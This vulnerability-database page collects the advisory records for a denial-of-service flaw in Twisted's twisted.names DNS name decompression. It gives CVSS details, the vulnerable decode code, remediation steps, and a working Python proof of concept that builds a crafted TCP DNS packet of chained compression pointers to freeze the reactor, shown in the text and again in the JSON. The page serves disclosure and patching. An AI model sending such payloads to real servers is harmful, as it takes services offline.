Vulnerability-Lookup

PYSEC-2026-160

Vulnerability from pysec - Published: 2026-05-13 21:16 - Updated: 2026-05-20 12:35

Details

Twisted is an event-based framework for internet applications, supporting Python 3.6+. Prior to 26.4.0rc2, the twisted.names module is vulnerable to a Denial of Service (DoS) attack via resource exhaustion during DNS name decompression. A remote, unauthenticated attacker can exploit this by sending a crafted TCP DNS packet containing deeply chained compression pointers. This flaw bypasses previous loop-prevention logic, causing the single-threaded Twisted reactor to hang while processing millions of recursive lookups, effectively freezing the server. This vulnerability is fixed in 26.4.0rc2.

Severity ?

7.5 (High)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Impacted products

Name	purl
twisted	pkg:pypi/twisted

Aliases

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "twisted",
        "purl": "pkg:pypi/twisted"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "26.4.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ],
      "versions": [
        "1.0.1",
        "1.0.3",
        "1.0.4",
        "1.0.5",
        "1.0.6",
        "1.0.7",
        "1.1.0",
        "1.1.1",
        "1.2.0",
        "10.0.0",
        "10.1.0",
        "10.2.0",
        "11.0.0",
        "11.1.0",
        "12.0.0",
        "12.1.0",
        "12.2.0",
        "12.3.0",
        "13.0.0",
        "13.1.0",
        "13.2.0",
        "14.0.0",
        "14.0.1",
        "14.0.2",
        "15.0.0",
        "15.1.0",
        "15.2.0",
        "15.2.1",
        "15.3.0",
        "15.4.0",
        "15.5.0",
        "16.0.0",
        "16.1.0",
        "16.1.1",
        "16.2.0",
        "16.3.0",
        "16.3.1",
        "16.3.2",
        "16.4.0",
        "16.4.1",
        "16.5.0",
        "16.5.0rc1",
        "16.5.0rc2",
        "16.6.0",
        "16.6.0rc1",
        "16.7.0rc1",
        "16.7.0rc2",
        "17.1.0",
        "17.1.0rc1",
        "17.5.0",
        "17.9.0",
        "17.9.0rc1",
        "18.4.0",
        "18.4.0rc1",
        "18.7.0",
        "18.7.0rc1",
        "18.7.0rc2",
        "18.9.0",
        "18.9.0rc1",
        "19.10.0",
        "19.10.0rc1",
        "19.2.0",
        "19.2.0rc1",
        "19.2.0rc2",
        "19.2.1",
        "19.7.0",
        "19.7.0rc1",
        "2.1.0",
        "2.4.0",
        "2.5.0",
        "20.3.0",
        "20.3.0rc1",
        "21.2.0",
        "21.2.0rc1",
        "21.7.0",
        "21.7.0rc1",
        "21.7.0rc2",
        "21.7.0rc3",
        "22.1.0",
        "22.1.0rc1",
        "22.10.0",
        "22.10.0rc1",
        "22.2.0",
        "22.2.0rc1",
        "22.4.0",
        "22.4.0rc1",
        "22.8.0",
        "22.8.0rc1",
        "23.10.0",
        "23.10.0rc1",
        "23.8.0",
        "23.8.0rc1",
        "24.10.0",
        "24.10.0rc1",
        "24.11.0",
        "24.11.0rc1",
        "24.11.0rc2",
        "24.2.0rc1",
        "24.3.0",
        "24.7.0",
        "24.7.0rc1",
        "24.7.0rc2",
        "25.5.0",
        "25.5.0rc1",
        "26.4.0rc2",
        "8.0.0",
        "8.0.1",
        "8.1.0",
        "8.2.0",
        "9.0.0"
      ]
    }
  ],
  "aliases": [
    "CVE-2026-42304",
    "GHSA-grgv-6hw6-v9g4"
  ],
  "details": "Twisted is an event-based framework for internet applications, supporting Python 3.6+. Prior to 26.4.0rc2, the twisted.names module is vulnerable to a Denial of Service (DoS) attack via resource exhaustion during DNS name decompression. A remote, unauthenticated attacker can exploit this by sending a crafted TCP DNS packet containing deeply chained compression pointers. This flaw bypasses previous loop-prevention logic, causing the single-threaded Twisted reactor to hang while processing millions of recursive lookups, effectively freezing the server. This vulnerability is fixed in 26.4.0rc2.",
  "id": "PYSEC-2026-160",
  "modified": "2026-05-20T12:35:31.546681Z",
  "published": "2026-05-13T21:16:46.933Z",
  "references": [
    {
      "type": "EVIDENCE",
      "url": "https://github.com/twisted/twisted/security/advisories/GHSA-grgv-6hw6-v9g4"
    }
  ],
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

CVE-2026-42304 (GCVE-0-2026-42304)

Vulnerability from cvelistv5 – Published: 2026-05-13 20:20 – Updated: 2026-05-14 15:45

Title

Twisted: Denial of Service (DoS) in twisted.names via Crafted DNS Compression Pointer Chains

Summary

Severity ?

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CWE

CWE-400 - Uncontrolled Resource Consumption
CWE-407 - Inefficient Algorithmic Complexity

Assigner

GitHub_M

References

1 reference

URL	Tags
https://github.com/twisted/twisted/security/advis…	x_refsource_CONFIRM

Impacted products

1 product

Vendor	Product	Version
twisted	twisted	Affected: < 26.4.0rc2

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-42304",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-05-14T15:44:57.486318Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-05-14T15:45:34.746Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "exploit"
            ],
            "url": "https://github.com/twisted/twisted/security/advisories/GHSA-grgv-6hw6-v9g4"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "twisted",
          "vendor": "twisted",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 26.4.0rc2"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Twisted is an event-based framework for internet applications, supporting Python 3.6+. Prior to 26.4.0rc2, the twisted.names module is vulnerable to a Denial of Service (DoS) attack via resource exhaustion during DNS name decompression. A remote, unauthenticated attacker can exploit this by sending a crafted TCP DNS packet containing deeply chained compression pointers. This flaw bypasses previous loop-prevention logic, causing the single-threaded Twisted reactor to hang while processing millions of recursive lookups, effectively freezing the server. This vulnerability is fixed in 26.4.0rc2."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-400",
              "description": "CWE-400: Uncontrolled Resource Consumption",
              "lang": "en",
              "type": "CWE"
            }
          ]
        },
        {
          "descriptions": [
            {
              "cweId": "CWE-407",
              "description": "CWE-407: Inefficient Algorithmic Complexity",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-05-13T20:20:29.149Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/twisted/twisted/security/advisories/GHSA-grgv-6hw6-v9g4",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/twisted/twisted/security/advisories/GHSA-grgv-6hw6-v9g4"
        }
      ],
      "source": {
        "advisory": "GHSA-grgv-6hw6-v9g4",
        "discovery": "UNKNOWN"
      },
      "title": "Twisted: Denial of Service (DoS) in twisted.names via Crafted DNS Compression Pointer Chains"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-42304",
    "datePublished": "2026-05-13T20:20:29.149Z",
    "dateReserved": "2026-04-26T12:13:55.552Z",
    "dateUpdated": "2026-05-14T15:45:34.746Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

GHSA-GRGV-6HW6-V9G4

Vulnerability from github – Published: 2026-05-05 21:12 – Updated: 2026-05-14 20:42

Summary

Twisted has a Denial of Service (DoS) in twisted.names via Crafted DNS Compression Pointer Chains

Details

The twisted.names module is vulnerable to a Denial of Service (DoS) attack via resource exhaustion during DNS name decompression. A remote, unauthenticated attacker can exploit this by sending a crafted TCP DNS packet containing deeply chained compression pointers. This flaw bypasses previous loop-prevention logic, causing the single-threaded Twisted reactor to hang while processing millions of recursive lookups, effectively freezing the server.

Technical Details

The main issue is in twisted.names.dns.Name.decode. A visited set was added in 2011 (commit e11cd82) to prevent infinite loops, but there is still no limit on the number of pointer dereferences per message. Also, the visited set is reset for each Question record.

Because DNSServerFactory handles every record in QDCOUNT without checking them, an attacker can add thousands of questions that all refer to the same long chain of pointers. This makes the parser repeat a complex and unnecessary search.

##  src/twisted/names/dns.py (Lines 595-631)

def decode(self, strio, length=None):
        visited = set()
        self.name = b""
        off = 0
        while 1:
            l = ord(readPrecisely(strio, 1))
            if l == 0:
                if off > 0:
                    strio.seek(off)
                return
            if (l >> 6) == 3:
                new_off = (l & 63) << 8 | ord(readPrecisely(strio, 1))
                if new_off in visited:
                    raise ValueError("Compression loop in encoded name")
                visited.add(new_off)
                if off == 0:
                    off = strio.tell()
                strio.seek(new_off)
                continue
            label = readPrecisely(strio, l)
            if self.name == b"":
                self.name = label
            else:
                self.name = self.name + b"." + label

PoC

import struct, time
from twisted.names import dns, server
from twisted.test import proto_helpers

def create_tcp_payload():
    num_pointers = 8000
    packet_length = 65533
    num_questions = (packet_length - (num_pointers * 2) - 12) // 6

    buffer = bytearray(packet_length)

    struct.pack_into("!HHHHHH", buffer, 0, 1, 0, num_questions, 0, 0, 0)

    ptr_offset = 12
    for _ in range(num_pointers - 1):
        struct.pack_into("!H", buffer, ptr_offset, 0xC000 | (ptr_offset + 2))
        ptr_offset += 2

    null_byte_offset = ptr_offset + 2
    struct.pack_into("!H", buffer, ptr_offset, 0xC000 | null_byte_offset)
    buffer[null_byte_offset] = 0

    question_offset = null_byte_offset + 1
    for _ in range(num_questions):
        if question_offset + 6 <= packet_length:
            struct.pack_into("!HHH", buffer, question_offset, 0xC000 | 12, 1, 1)
            question_offset += 6

    return packet_length, num_pointers, num_questions, struct.pack("!H", packet_length) + buffer

def test_dns_server():
    factory = server.DNSServerFactory(clients=[])
    protocol = factory.buildProtocol(("127.0.0.1", 10053))
    transport = proto_helpers.StringTransport()
    protocol.makeConnection(transport)

    pkt_len, num_ptrs, num_qs, payload = create_tcp_payload()
    print("payload")
    print(f"len={pkt_len} ptrs={num_ptrs} qs={num_qs}")

    start = time.time()
    protocol.dataReceived(payload)
    end = time.time()

    print(f"time={end - start:.4f}s")

if __name__ == "__main__":
    test_dns_server()

Impact

A single malformed TCP packet is sufficient to block the Twisted reactor's event loop for several seconds. Because Twisted operates on a single-threaded cooperative multitasking model, this is a common Denial of Service (DoS). The process becomes unable to handle new connections, process I/O, or respond to existing requests, effectively paralyzing the server for the duration of the decompression.

Remediation

Update twisted.names.dns.Name.decode to add a required limit on pointer resolutions per DNS message
Share the "resolved offset" state across all records in a single message to prevent redundant processing.
Validate the number of questions before entering the decoding loop in Message.decode.

Resources

https://cwe.mitre.org/data/definitions/400.html

https://cwe.mitre.org/data/definitions/407.html

https://datatracker.ietf.org/doc/html/rfc9267

https://github.com/twisted/twisted/blob/trunk/src/twisted/names/dns.py#L595

https://github.com/twisted/twisted/commit/e11cd82bdd79b3ebbb0e8635cbb9c76df2b5af09

Author: Tomas Illuminati

Severity ?

7.5 (High)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 25.5.0"
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "Twisted"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "26.4.0rc2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-42304"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400",
      "CWE-407"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-05T21:12:37Z",
    "nvd_published_at": "2026-05-13T21:16:46Z",
    "severity": "HIGH"
  },
  "details": "### Details\n\nThe twisted.names module is vulnerable to a Denial of Service (DoS) attack via resource exhaustion during DNS name decompression. A remote, unauthenticated attacker can exploit this by sending a crafted TCP DNS packet containing deeply chained compression pointers. This flaw bypasses previous loop-prevention logic, causing the single-threaded Twisted reactor to hang while processing millions of recursive lookups, effectively freezing the server.\n\n---\n\n### Technical Details\n\nThe main issue is in twisted.names.dns.Name.decode. A visited set was added in 2011 (commit e11cd82) to prevent infinite loops, but there is still no limit on the number of pointer dereferences per message. Also, the visited set is reset for each Question record.\n\nBecause DNSServerFactory handles every record in QDCOUNT without checking them, an attacker can add thousands of questions that all refer to the same long chain of pointers. This makes the parser repeat a complex and unnecessary search.\n\n```python\n##  src/twisted/names/dns.py (Lines 595-631)\n\ndef decode(self, strio, length=None):\n        visited = set()\n        self.name = b\"\"\n        off = 0\n        while 1:\n            l = ord(readPrecisely(strio, 1))\n            if l == 0:\n                if off \u003e 0:\n                    strio.seek(off)\n                return\n            if (l \u003e\u003e 6) == 3:\n                new_off = (l \u0026 63) \u003c\u003c 8 | ord(readPrecisely(strio, 1))\n                if new_off in visited:\n                    raise ValueError(\"Compression loop in encoded name\")\n                visited.add(new_off)\n                if off == 0:\n                    off = strio.tell()\n                strio.seek(new_off)\n                continue\n            label = readPrecisely(strio, l)\n            if self.name == b\"\":\n                self.name = label\n            else:\n                self.name = self.name + b\".\" + label\n\n```\n\n---\n\n### PoC\n\n```python\nimport struct, time\nfrom twisted.names import dns, server\nfrom twisted.test import proto_helpers\n\ndef create_tcp_payload():\n    num_pointers = 8000\n    packet_length = 65533\n    num_questions = (packet_length - (num_pointers * 2) - 12) // 6\n\n    buffer = bytearray(packet_length)\n\n    struct.pack_into(\"!HHHHHH\", buffer, 0, 1, 0, num_questions, 0, 0, 0)\n\n    ptr_offset = 12\n    for _ in range(num_pointers - 1):\n        struct.pack_into(\"!H\", buffer, ptr_offset, 0xC000 | (ptr_offset + 2))\n        ptr_offset += 2\n\n    null_byte_offset = ptr_offset + 2\n    struct.pack_into(\"!H\", buffer, ptr_offset, 0xC000 | null_byte_offset)\n    buffer[null_byte_offset] = 0\n\n    question_offset = null_byte_offset + 1\n    for _ in range(num_questions):\n        if question_offset + 6 \u003c= packet_length:\n            struct.pack_into(\"!HHH\", buffer, question_offset, 0xC000 | 12, 1, 1)\n            question_offset += 6\n\n    return packet_length, num_pointers, num_questions, struct.pack(\"!H\", packet_length) + buffer\n\ndef test_dns_server():\n    factory = server.DNSServerFactory(clients=[])\n    protocol = factory.buildProtocol((\"127.0.0.1\", 10053))\n    transport = proto_helpers.StringTransport()\n    protocol.makeConnection(transport)\n\n    pkt_len, num_ptrs, num_qs, payload = create_tcp_payload()\n    print(\"payload\")\n    print(f\"len={pkt_len} ptrs={num_ptrs} qs={num_qs}\")\n\n    start = time.time()\n    protocol.dataReceived(payload)\n    end = time.time()\n\n    print(f\"time={end - start:.4f}s\")\n\nif __name__ == \"__main__\":\n    test_dns_server()\n```\n\n---\n\n### Impact\n\nA single malformed TCP packet is sufficient to block the Twisted reactor\u0027s event loop for several seconds. Because Twisted operates on a single-threaded cooperative multitasking model, this is a common Denial of Service (DoS). The process becomes unable to handle new connections, process I/O, or respond to existing requests, effectively paralyzing the server for the duration of the decompression.\n\n---\n\n### Remediation\n\n- Update twisted.names.dns.Name.decode to add a required limit on pointer resolutions per DNS message\n- Share the \"resolved offset\" state across all records in a single message to prevent redundant processing.\n- Validate the number of questions before entering the decoding loop in Message.decode.\n\n---\n\n### Resources\n\nhttps://cwe.mitre.org/data/definitions/400.html\n\nhttps://cwe.mitre.org/data/definitions/407.html\n\nhttps://datatracker.ietf.org/doc/html/rfc9267\n\nhttps://github.com/twisted/twisted/blob/trunk/src/twisted/names/dns.py#L595\n\nhttps://github.com/twisted/twisted/commit/e11cd82bdd79b3ebbb0e8635cbb9c76df2b5af09\n\n---\n\n**Author**: Tomas Illuminati",
  "id": "GHSA-grgv-6hw6-v9g4",
  "modified": "2026-05-14T20:42:07Z",
  "published": "2026-05-05T21:12:37Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/twisted/twisted/security/advisories/GHSA-grgv-6hw6-v9g4"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42304"
    },
    {
      "type": "WEB",
      "url": "https://github.com/twisted/twisted/commit/e11cd82bdd79b3ebbb0e8635cbb9c76df2b5af09"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/twisted/twisted"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Twisted has a Denial of Service (DoS) in twisted.names via Crafted DNS Compression Pointer Chains"
}

Sightings

Author	Source	Type	Date	Other

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

PYSEC-2026-160

CVE-2026-42304 (GCVE-0-2026-42304)

GHSA-GRGV-6HW6-V9G4

Details

Technical Details

PoC

Impact

Remediation

Resources

Tags

Sightings

Nomenclature